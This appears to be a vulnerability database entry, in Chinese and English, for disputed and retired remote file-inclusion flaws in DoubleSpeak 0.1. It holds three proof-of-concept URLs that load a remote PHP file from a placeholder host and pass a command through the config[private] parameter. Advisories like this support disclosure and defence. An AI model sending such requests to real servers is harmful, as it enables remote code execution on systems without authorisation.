RETIRED: DoubleSpeak 多个远程文件包含漏洞

https://www.exploit-db.com/exploits/28016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-373

**有争议**DoubleSpeak0.1存在PHP远程文件包含漏洞。register_globals启用时，远程攻击者可以借助多个文件中的config[private]参数，执行任意PHP代码，比如(1)index.php,(2)faq.php和(3)hardware.php。注:多位第三方研究者对此提出反驳，声称config[private]在被使用前已在include文件中初始化。

source: http://www.securityfocus.com/bid/18401/info

DoubleSpeak is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect versions 0.1 and prior; other versions may also be vulnerable.

This BID has been retired.

http://www.example.com/[igloo_Path]/html/index.php?config[private]=http://www.example.com/x.txt?&cmd=uname -a
http://www.example.com/[igloo_Path]/html/faq.php?config[private]=http://www.example.com/x.txt?&cmd=uname -a
http://www.example.com/[igloo_Path]/html/hardware.php?config[private]=http://www.example.com/x.txt?&cmd=uname -a

来源:BID
名称:18401
链接:http://www.securityfocus.com/bid/18401
来源:OSVDB
名称:27436
链接:http://www.osvdb.org/27436
来源:SECTRACK
名称:1016278
链接:http://securitytracker.com/id?1016278
来源:VIM
名称:20060723IglooDoublSpeakvuln
链接:http://attrition.org/pipermail/vim/2006-July/000935.html
来源:BUGTRAQ
名称:20060612Re:iglooDoubleSpeakv0.1Multipleremotefileinclusion
链接:http://archives.neohapsis.com/archives/bugtraq/2006-06/0184.html